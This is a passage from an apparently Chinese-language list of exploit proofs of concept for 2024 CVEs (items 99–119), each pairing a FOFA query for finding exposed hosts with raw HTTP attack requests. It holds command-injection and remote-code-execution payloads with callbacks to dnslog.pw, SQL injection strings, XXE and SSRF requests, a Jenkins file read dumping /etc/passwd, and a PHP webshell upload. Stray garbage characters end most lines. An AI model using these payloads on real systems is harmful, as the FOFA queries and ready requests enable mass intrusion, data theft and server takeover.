Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ R" P. L$ i' J% O: QContent-Type: application/x-www-form-urlencoded; charset=UTF-8
$ T7 G. k: @5 c( E& f }) DX-Requested-With: XMLHttpRequest2 D$ }9 ~+ U* ?% ]1 f
9 K( q4 A* ?9 Z' eid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
5 R+ [& J5 T0 W( {: L# @8 p, o. x) l1 Z$ I! l
- A7 }1 r+ l& H4 Q$ _
99. Ncast盈可视高清智能录播系统busiFacade RCE
2 H% S5 j1 q9 _7 m& PCVE-2024-0305
( J! M4 h& g8 b! @& |: RFOFA:app="Ncast-产品" && title=="高清智能录播系统"
; v# f0 ?9 m- r3 pPOST /classes/common/busiFacade.php HTTP/1.1, A0 N! g: J5 y9 M% ]
Host: 192.168.40.130:8080# ?, [7 ?* X6 G3 m4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 D5 ^" @( r0 v) RConnection: close* n2 r7 h3 Q* p8 M$ A& r6 r$ u2 e: D
Content-Length: 154) B( j) Z' I9 ~/ |! t' u
Accept: */*; Y4 x! ]2 s1 P' K' @ p( L# V
Accept-Encoding: gzip, deflate
- X( X% J w7 M3 b5 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 \# `/ Z% X& q; T
Content-Type: application/x-www-form-urlencoded; charset=UTF-8* Y% G7 m3 F6 m$ U
X-Requested-With: XMLHttpRequest! a1 H; i3 U& ?; @2 I4 T! [& {
+ m7 L; C; k1 ?
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D6 v, g) n+ R- R- E$ m
. o( z4 s% r0 }& M
3 ^. D! v- l _7 e2 _/ W% V: Z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" K2 O" A- T/ c+ S6 |+ k5 f" _CVE-2024-0352
T, b+ K8 a# s) y6 j- ?, uFOFA:icon_hash="874152924"
7 q/ g! M2 c1 y' N' FPOST /api/file/formimage HTTP/1.1
5 S) N2 S' I/ n, @Host: 192.168.40.1309 F1 d6 f+ `2 E2 q1 q
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! l1 ] R8 f* N. Y! p+ C t' g) PConnection: close% A6 [3 n' |# H% u9 {1 k( }
Content-Length: 2016 O: ^2 P, e0 |& o% b9 z1 K- V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei% @3 ^) Y) n, W: C$ D
Accept-Encoding: gzip) c# u: Y0 ?. w: T$ ~9 T
( E# G( |3 |, g7 H. E
------WebKitFormBoundarygcflwtei
# g: _; C9 a& M: q+ r* F: j" FContent-Disposition: form-data; name="file";filename="IE4MGP.php"
. m4 }4 ~: k4 S% lContent-Type: application/x-php2 l* l- y! f; V! R7 _
$ i0 Q @$ `( I, K1 L& b0 X2ayyhRXiAsKXL8olvF5s4qqyI2O$ m. ]! \8 j- U3 y7 J/ k. M3 h9 v
------WebKitFormBoundarygcflwtei--% a1 ?' G8 v7 a- i" R: q( Q
, J% N, T; b# T4 O( O( r
8 y) O1 B1 p* F+ b, c3 I101. ivanti policy secure-22.6命令注入. Z% |. H% D! e) J* z
CVE-2024-218876 t" f# [7 y- F
FOFA:body="welcome.cgi?p=logo"5 v" }& u% V, W3 O3 H9 x
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.15 h) @/ e% z* a9 X' ]3 o1 {
Host: x.x.x.xx.x.x.x
/ q0 T( C" }$ V8 f( ?! C( O/ [9 R2 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 {9 ?! {2 ~" |/ BConnection: close8 J1 h9 l- O! j2 P- G
Accept-Encoding: gzip5 ?- F1 F; `( x& X5 \/ C q8 q5 X
9 x2 v, s/ K3 C! W; M, q7 D- ]$ L9 Z% n4 Q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ }) r9 B H- Q: ~
CVE-2024-21893* h. d% K, F, A% Y" B
FOFA:body="welcome.cgi?p=logo"5 q V. x* D0 N! |) p0 Z, {: t
POST /dana-ws/saml20.ws HTTP/1.1
" u7 p3 B1 r ?) d5 [# s- {Host: x.x.x.x: M* l% @9 v% Y3 V: K, N' [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 |) d2 w: }7 o% f% m* R4 PConnection: close$ l' ~1 r/ M7 m U7 r" E
Content-Length: 792
( x( i; g l6 E$ S4 s' q' O& w- A- OAccept-Encoding: gzip5 y. M; U$ Q' H
0 f* c; T6 o! k0 b<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>; t' C- ^4 i6 ^) U' O
: s+ ]% L& A1 }
103. Ivanti Pulse Connect Secure VPN XXE
( M$ K0 G! T8 ?# I; q* P- B- cCVE-2024-22024$ i1 n3 A, _* F2 c X, D# S$ Y
FOFA:body="welcome.cgi?p=logo"& G. y0 A/ v" A7 ], @* P6 p
POST /dana-na/auth/saml-sso.cgi HTTP/1.1+ ~9 Y3 {! J9 e5 w$ z
Host: 192.168.40.130:111
1 [+ _/ _: C/ ? ?7 WUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
" U/ \+ w. p8 x) WConnection: close
3 c4 f# A% g8 Z/ X% |& d1 b5 N3 }Content-Length: 204
, }% \8 o( y! C( RContent-Type: application/x-www-form-urlencoded
, h0 |9 m( h1 Q' J+ w5 _1 ?Accept-Encoding: gzip$ V, Q% F: Y0 [/ q2 ^- l9 B
( s: D5 y! [; a5 e% g
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
* A) t. Y: ?$ n* B! a
& X3 w: h4 m- P3 P8 L" U
: G: ]& M" ]9 y V. X% p0 t5 d其中SAMLRequest的值是xml文件内容的base64值,xml文件如下' L# h/ e# j, r' J$ {# h
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
& d0 u0 p/ ?- n" t" `
3 a7 K/ j$ A( `" J: f% i! V9 w8 {/ Y5 I, u( b- N4 ^$ l3 M2 W5 }" A
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露% G' L% O. M* `& D- H, t+ t( J M
CVE-2024-0569
0 u/ E7 R$ H/ h& q; Y; NFOFA:title="TOTOLINK"6 b! h- a: {" n D( `
POST /cgi-bin/cstecgi.cgi HTTP/1.1
! ]0 }* b. n3 p6 rHost:192.168.0.17 J- N) o8 C9 w8 R5 J
Content-Length:417 j7 d: G7 S6 R' x0 z+ |8 T
Accept:application/json,text/javascript,*/*;q=0.01) u( ^2 n; N* f$ s
X-Requested-with: XMLHttpRequest) Y2 C B+ ^' G+ q# P
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36! ]* m( @8 E1 f! A$ g. k0 O$ p
Content-Type: application/x-www-form-urlencoded:charset=UTF-8 u8 G( J. d$ Z7 h& J% k
Origin: http://192.168.0.14 l7 a' c( V3 {1 G2 `. g
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
6 b) \. _) `2 X* |3 \, JAccept-Encoding:gzip,deflate
, s/ u! S* W. q2 A7 QAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7" G. x% C6 s, t1 t" w
Connection:close* ^) x# a% i+ A
# r% {% W- K3 E4 P* h6 f
{
' Y* `/ M% W+ J% j; i. j4 Y1 F"topicurl":"getSysStatusCfg",8 K& c. [! h! c) { _! s
"token":""
$ `9 ^& ~# P& S. J( I6 o}
D8 o ~; a" p5 C& X/ x4 k8 X* y* ^5 V1 U5 I G
105. SpringBlade v3.2.0 export-user SQL 注入, g4 K9 _; B* k+ z& v" P2 y, [
FOFA:body="https://bladex.vip"3 k, O4 y1 @* j: e) E* |9 f' e/ Y
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1, Y' {7 I0 U3 d$ ~6 X, a
- E& ?! D2 A% p9 e! H% i4 }5 L106. SpringBlade dict-biz/list SQL 注入
! O/ H+ a9 g5 Q; E, V8 b# DFOFA:body="Saber 将不能正常工作") x7 p- }. V) Q% D8 Z. H
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ ]; F7 R2 q4 p5 }& l1 ~Host: your-ip& D0 a2 v$ E, L9 B8 G7 g6 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: Z1 V0 Z6 ?: x1 HBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A3 K; R ]+ ~9 }2 X2 \% d
Accept-Encoding: gzip, deflate
, D% q. `3 J1 `* M2 J- m" [Accept-Language: zh-CN,zh;q=0.9
: K, F: [4 p! d0 L: d# ~) T" zConnection: close
: X1 F+ ? H9 ~# Z2 H$ y y) X/ R; D$ P! f$ s& Y
) A: r4 K4 d1 L4 X" G7 v9 w107. SpringBlade tenant/list SQL 注入
; Y2 ~$ X. C3 k5 W* _FOFA:body="https://bladex.vip". [+ F2 K2 P( g* U
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: }- U9 i0 D: u8 V( r* }8 @2 H
Host: your-ip
6 q# L, w/ p5 k4 g' P! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 |- W: ?1 I2 n& _Blade-Auth:替换为自己的
- R' D3 O0 e, _. D; ]( U) [Connection: close
: [, J- O, I% N! Z( y7 f% |
" L% V! G5 l0 d) g
I8 ~# P. N. c5 V& R108. D-Tale 3.9.0 SSRF. H. g) d$ q5 s9 x
CVE-2024-21642
& N6 d+ N) s# v: h. gFOFA:"dtale/static/images/favicon.png": R3 \+ S: }3 x5 M0 O
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.13 f) S" ?" k" [ `% ?* K# M
Host: your-ip
6 N8 h2 v3 f' v8 Y' ?$ x4 LAccept: application/json, text/plain, */*+ k8 l. r G: t) ^9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( I) i2 ] @' ?9 m' B* Q- ^6 B
Accept-Encoding: gzip, deflate0 H" G# z }! U! }$ O5 L6 M) C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* ^0 x& C5 P# R2 M- j% d0 U3 `Connection: close) l8 T" Y4 z3 P6 T- n8 H2 Q
2 K0 U! p% K, [% O9 s; ]: ~; J
5 W% N% ?6 t1 @
109. Jenkins CLI 任意文件读取& m" H5 c+ G7 T) B0 h
CVE-2024-238974 d( c; \" i+ g
FOFA:header="X-Jenkins"
5 y- Z- L0 z$ J, c7 r" Z7 L8 P4 \POST /cli?remoting=false HTTP/1.1- l! d& ]1 c( I# z
Host:
) D* N: G: m2 O2 PContent-type: application/octet-stream
: Q% ~+ y) X( v( T' [Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ Q" [+ g! M3 U8 j9 D/ zSide: upload4 Q E) T- X2 }; K" k
Connection: keep-alive
+ A0 X2 {! w* M5 b9 BContent-Length: 163
% N; [" a+ N% e |6 F- g& m- p% @0 w u) M
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', O2 m# ]/ d+ {0 X5 ~) K& X
5 [' I" V+ r0 r9 s5 x; ?( n1 x
4 U" d7 e# C# S$ {
POST /cli?remoting=false HTTP/1.1+ m+ P T9 e* B; h* d
Host:
1 J" V# E* g% l! R& K; D* w% YSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 t; s$ |2 D" hdownload
2 }0 v- R' Q; i. o/ TContent-Type: application/x-www-form-urlencoded
/ \9 F' P' K4 g/ u2 J6 B7 ^Content-Length: 0' D' n" [+ G9 M, _! I( I& G, ?
, h P. J6 j7 }$ l
, o! @2 J5 B- _; I
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
) y5 A3 W( N G6 ujava -jar jenkins-cli.jar help) w& T6 f; m9 K
[COMMAND]3 C8 I* G8 e0 h; g( s7 l7 v
Lists all the available commands or a detailed description of single command.# P- N3 N" t8 b. k9 k# x7 G2 {1 M
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% u$ X2 L$ Z/ c v3 O9 N l) ^
( d/ h7 K$ B: J S; O7 _3 s
6 A9 C" w1 Q2 o+ x5 f110. Goanywhere MFT 未授权创建管理员
1 X6 W( x( w/ uCVE-2024-0204$ @4 l4 ]0 t, ~* P) Y
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
C$ F* ]0 D9 L+ ?' U/ rGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
, y; `- M) W% e8 M+ tHost: 192.168.40.130:8000
+ |9 h( C/ p! \ qUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
+ M& `# K+ y7 ~; B7 O8 U2 t7 U5 DConnection: close
7 i/ D) n7 G, m) R7 M0 UAccept: */*, H/ R/ K" ? H
Accept-Language: en
7 a: ?2 {, u+ x' LAccept-Encoding: gzip* z5 @2 l1 O; {$ f) Z$ a! Z- r
/ V9 ]' T! _6 g1 T. I
7 J2 B2 C$ l' M, j6 l
111. WordPress Plugin HTML5 Video Player SQL注入
$ `6 [. I. q- n* ^( ECVE-2024-1061 F! k& g7 ^! ?1 X7 ^, j" B
FOFA:"wordpress" && body="html5-video-player"" G3 n" Z' r5 k0 a& B6 D% m
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.18 ]" Y' | W( b( Z1 ^1 W, N! Q
Host: 192.168.40.130:112 s6 S6 ~% q/ \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# j6 ^9 h: s* s: _. [1 ?1 `5 }
Connection: close
) ~- h; n# l; @3 IAccept: */*
8 s' z' M2 J/ \2 J3 UAccept-Language: en
$ G3 Z# M3 i: o7 w0 iAccept-Encoding: gzip
; d( g( w7 u" ?
% ~- X$ D1 c; ~3 o6 t* P
# K& O% r% v6 ?1 w" `4 h5 b" ^112. WordPress Plugin NotificationX SQL 注入
5 D) E1 z7 n' ~- N1 RCVE-2024-1698
: R4 h# B5 q1 H% V" PFOFA:body="/wp-content/plugins/notificationx"
4 p! z6 h7 X- q0 l' XPOST /wp-json/notificationx/v1/analytics HTTP/1.1& C% U# H' S1 N2 m6 L
Host: {{Hostname}}) V) F* |0 s/ y, f2 m# I, M
Content-Type: application/json, d: T0 e$ J' q; t/ h Y9 J9 D3 g
% _: N6 w; l( W- l& U) F/ O8 h
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
9 a% e/ r+ b4 b* c! u
( C: }+ A$ q% |, |$ g& k! g- ?9 H V1 d. Y
113. WordPress Automatic 插件任意文件下载和SSRF
~" t% F; }' G9 v' p8 NCVE-2024-27954 J5 H. q* o8 b; f3 u0 ?
FOFA:"/wp-content/plugins/wp-automatic"* ~( s! o; R9 b5 R6 c
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
& L) M" M% h; x" EHost: x.x.x.x
) |: x) i! J0 _# w. s/ X1 \User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.368 R* X' i, T- ?0 v$ P
Connection: close
( b$ j/ G8 D( \5 f2 {: PAccept: */*0 G' e4 T; r7 P c
Accept-Language: en
+ n: b7 x ?' h2 P. Y5 |' U- wAccept-Encoding: gzip
! N: n$ O7 ^& r V& k; B+ w( P- M/ _4 K6 `4 S& \( e
9 f* |2 T& X6 M; n( d1 o8 T2 ?
114. WordPress MasterStudy LMS插件 SQL注入
9 S. k0 b# l- j/ t0 a9 A/ Z! V# uFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/": [. a3 t7 j" U# R" K1 h
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
$ Q! f) T# \ F% h2 Q4 d UHost: your-ip9 E/ { s- P/ j+ [1 t, L
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 n! p) _7 Z1 _2 P, Z4 T$ UAccept-Charset: utf-8
% _/ \( M2 U2 U6 j9 FAccept-Encoding: gzip, deflate
" d" D V; F; D# [# _; i+ t& WConnection: close& {3 Q3 I: W6 y6 R+ @% m) `' S
4 u) Y, `: d! A, v+ Q
' ~% w$ Q' j, i8 _3 a. H
115. WordPress Bricks Builder <= 1.9.6 RCE/ |' H1 A4 d$ y- i# Q
CVE-2024-25600% V0 ?4 ^" r9 J5 W, ~( a+ g
FOFA: body="/wp-content/themes/bricks/"
3 F; P: Y3 g/ Q% a( X6 Y第一步,获取网站的nonce值
/ B$ I5 _ x, \" B S2 L% EGET / HTTP/1.1
' K( U- H" ]6 k [2 FHost: x.x.x.x
1 J& t+ h; ^0 s+ ^5 qUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.366 e" E1 g$ L/ x) d' j4 x" f! }
Connection: close) w/ s9 N" v/ B) I* o# c& D
Accept-Encoding: gzip
6 R/ {1 W& |: l" r/ @( D" M# k8 D7 }3 N
$ q$ g1 a5 k1 Q- Z3 \) U第二步替换nonce值,执行命令
- O2 L: ?9 v4 ?% `& zPOST /wp-json/bricks/v1/render_element HTTP/1.1
: e4 j0 [* p4 VHost: x.x.x.x( s- Y2 ^& o$ D; ?6 O/ S" \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: E, `( i/ \ T sConnection: close V# v6 [3 d) }
Content-Length: 356
0 S- Y7 b R, I" @$ } fContent-Type: application/json
- Y$ j- \2 j d- F1 L0 BAccept-Encoding: gzip
: o- Y: A! I# m; h% E q! y# J [
0 ~9 ~7 e) \. S9 c{# x" F0 t1 u( m9 q H
"postId": "1",
5 d6 c9 y. Q u, L" @" y "nonce": "第一步获得的值",
' O$ `) \6 O7 r "element": {5 w/ m& O; z: N7 X
"name": "container",
V$ W; w2 O+ ?" n" q2 E "settings": {0 }+ \! Z0 J7 F# k
"hasLoop": "true",
$ A- d" E" N L9 [, K- G0 r "query": {5 C, t( P# k: r/ d. V& A& M1 F
"useQueryEditor": true,+ G0 t4 {% V4 s- k ]# s
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 | G2 P, d6 G7 c) x+ D( G- {8 { "objectType": "post"
$ G* f0 o* X p+ y7 E }
/ B( T: j" f2 b2 h6 H }
. V- |+ J, E! S0 v( q }
* a1 L) Z4 U% Q9 y+ x2 `' r5 Y3 b}+ a- F2 p/ T8 o9 Q( |4 n4 {
7 A4 z3 o, T8 F* o& O# N% ^1 ?2 {2 B- X
! D- _1 ?0 [& }9 V+ z0 g- H) Q116. wordpress js-support-ticket文件上传
8 I: M- ~1 S! E+ h1 CFOFA:body="wp-content/plugins/js-support-ticket"
8 E/ f2 Y. X; r2 u( jPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
2 f' n/ q& w8 |Host:$ z8 e8 `+ g' B
Content-Type: multipart/form-data; boundary=--------767099171
3 M) }( G# | M5 s+ m8 X5 yUser-Agent: Mozilla/5.0
" T% R0 ? n$ x5 [; g1 F w r% \" A2 U9 m3 n' {
----------7670991712 R, w+ @% t, h: R9 j# r4 c
Content-Disposition: form-data; name="action"
. z9 ~, C3 G! _3 lconfiguration_saveconfiguration- _; {7 d. y& f" I7 w
----------7670991716 P& p# N8 S& @: z7 U- e
Content-Disposition: form-data; name="form_request"8 j' q. E2 S" J+ ?3 V5 q
jssupportticket/ [( I) n. Y4 N; T8 Z
----------767099171
+ K( \! B* ~' w2 p5 VContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php". M% [6 F v8 ?4 O+ d- ~" Q9 J2 U
Content-Type: image/png; }- u4 \$ U% K" h
----------767099171--, p; F3 y ~! X3 i1 E3 A$ f
4 H1 Z4 ^! {9 P W8 ]
2 r/ E0 p; l! O) P2 C2 D
117. WordPress LayerSlider插件SQL注入
4 U- `4 ~- R. X; `1 U% p/ sversion:7.9.11 – 7.10.0
+ u6 l" J2 o7 XFOFA:body="/wp-content/plugins/LayerSlider/"
. H! f5 O- v# gGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ @& b/ ?+ {% O ?5 ^Host: your-ip9 `0 l2 U9 b$ M4 y1 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% X) t- Q! x. AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 Y) T7 Y9 ~8 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 r# Q9 c9 e" h9 V5 O5 @* \
Accept-Encoding: gzip, deflate, br
0 F" | l/ L3 z3 t' jConnection: close
7 r7 [# D/ m2 M4 |Upgrade-Insecure-Requests: 1: a! u2 {' ~3 A
/ |. c% X( D3 @6 m ` _! v) L9 B
9 `+ t5 A8 h( ]+ V( j$ _1 C k
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传* h/ b6 ?/ D) [9 ?
CVE-2024-09392 t3 h7 X3 h# B% ]( j
FOFA:title="Smart管理平台"
/ q% Y# T+ o I- P# ^POST /Tool/uploadfile.php? HTTP/1.1* f" }& s! `/ D3 X, ]! f; s
Host: 192.168.40.130:8443
% {& ~ ]; h% ^" |# q5 WCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8& O! |! e) [2 d4 w Z4 q% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
! F' `( [7 M1 z, X1 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ]" @0 ~# n& l) i; m, f8 F7 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ H0 T+ D/ ^- b
Accept-Encoding: gzip, deflate
+ H1 P1 h" Q/ z1 s+ P7 _6 j/ AContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828874 c; {7 H+ ~/ `
Content-Length: 405
% d: t9 S$ @& X8 V/ O# X" FOrigin: https://192.168.40.130:8443
% t( g; |8 L$ G* sReferer: https://192.168.40.130:8443/Tool/uploadfile.php8 X- B+ \: u! E' \$ H0 \
Upgrade-Insecure-Requests: 1/ U+ ]2 p/ ]- `4 K! G# P
Sec-Fetch-Dest: document, S& g% N2 ?! Z O7 y) p9 n
Sec-Fetch-Mode: navigate
8 b7 n6 [$ ?, N/ [' F4 ESec-Fetch-Site: same-origin
/ ?) M# z/ U0 v7 G8 r/ `Sec-Fetch-User: ?1
( X5 _* I" c, ~1 H S* OTe: trailers" x0 |: F) A( ^
Connection: close
; R' C% O; b0 [4 L! g& o
$ p6 N- E7 k1 h# i! c+ o1 l-----------------------------13979701222747646634037182887! U0 d( o* N. f' l1 Q
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
. `4 m" o. d; L* A# V8 {7 o8 GContent-Type: application/octet-stream
& W5 S% `$ Y( q. m2 z5 O/ D: e; w( @/ m! E+ W1 {: p" r9 k' i0 j
<?php) G8 \7 `4 y; i" b9 G/ e
system($_POST["passwd"]);0 g/ C) u* _0 a9 n; z4 [
?>9 R, c \4 X2 j8 p
-----------------------------13979701222747646634037182887
; n! l6 D7 C& w7 Y; vContent-Disposition: form-data; name="txt_path", u8 S: h$ k1 l8 d6 I
( P x$ v1 M, a
/home/src.php. b- \$ d( [4 N
-----------------------------13979701222747646634037182887--
( C% y; M2 j! q/ G1 P& u" z" N5 S
7 k* `! x+ W% q1 @6 X0 h
: i# @0 @; ~3 y. c5 @访问/home/src.php; q& N: u# J1 m2 w7 F) H1 R* L
6 K" t0 U; Z! p4 D3 K
119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 U2 w. n: P9 _( k/ }CVE-2024-1254
6 k4 |4 G; P# a; SFOFA:title="Smart管理平台"8 Z1 M2 f$ |( K3 z+ b
先登录进入系统,默认账号密码为admin/admin
1 M, h, l I4 U1 A v9 r7 e# nPOST /sysmanage/sysmanageajax.php HTTP/1.117 p M4 Z. J1 R9 ~; [( K/ A r
Host: x.x.x.x
' o7 f, i; e, t N" p1 W; C$ UCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee# ?% C2 q1 t9 G' \& G E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.01 [- m4 p. H8 g$ M; f8 f; P7 v+ ~
Accept: */*
E2 c. d! e& k$ j# Q- cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ u& u1 d* ^5 rAccept-Encoding: gzip, deflate
, L( g6 m9 S6 [, SContent-Type: application/x-www-form-urlencoded;; p% o7 _! U; h8 n0 G
Content-Length: 109
. G: n0 D1 ~% G) tOrigin: https://58.18.133.60:8443$ f4 P0 n5 Z$ b/ Q) j
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
- ]7 _, C& M) jSec-Fetch-Dest: empty. N/ l e) ~. U4 J3 }4 c) |
Sec-Fetch-Mode: cors
, C% n) \6 H. s" E9 ^Sec-Fetch-Site: same-origin( U& ~' N( l# b/ M+ V0 C. w
X-Forwarded-For: 1.1.1.1
6 D) |' q! k- I, p, d1 t3 KX-Originating-Ip: 1.1.1.1
